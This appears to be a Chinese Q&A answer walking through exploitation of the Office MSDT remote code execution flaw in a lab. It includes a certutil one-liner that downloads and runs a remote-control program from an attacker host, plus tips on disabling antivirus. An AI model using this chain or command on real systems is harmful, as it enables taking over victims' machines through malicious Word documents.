发布网友 发布时间:2024-09-27 14:25
共1个回答
热心网友 时间:2024-11-10 04:27
简介: 用户在点击word等应用程序时,会通过URL协议调用MSDT并启动msdt.exe程序,导致远程代码执行漏洞。攻击者可构造恶意word文档诱骗点击,进而黑入系统。
0x01 环境部署
1. 测试版本:Microsoft Office LTSC 专业增强版 2021
2. 测试系统:windows 10 教育版
0x02 尝试执行calc弹出计算器
1. 利用脚本生成带有恶意请求的word文件。
2. 在本机开启监听,受害者打开word时访问恶意文件。
3. 将word文件复制到虚拟机打开,发现打开word的同时,系统执行了calc命令打开计算器。
0x03 尝试获取系统权限
1. 利用大灰狼生成远控程序,放置于监听目录下。
2. 生成携带新命令的恶意word文件。
certutil -urlcache -split -f http://192.168.2.1/server.exe c:\\server.exe & c:\\server.exe
此命令表示利用windows自带的命令certutil远程下载并执行本地远控程序。
3. 将文件复制到虚拟机打开,本机开启监听服务。
可以看到主机已上线,可执行系统命令。
注意事项:由于未进行免杀处理,需关闭杀软和Windows Defender。
可尝试其他Office版本和系统。
可尝试使用wget、curl等Windows下载命令。
win10已测试,其他系统可尝试。
相关脚本软件和教程可参考b站视频。 bilibili.com/video/BV1L...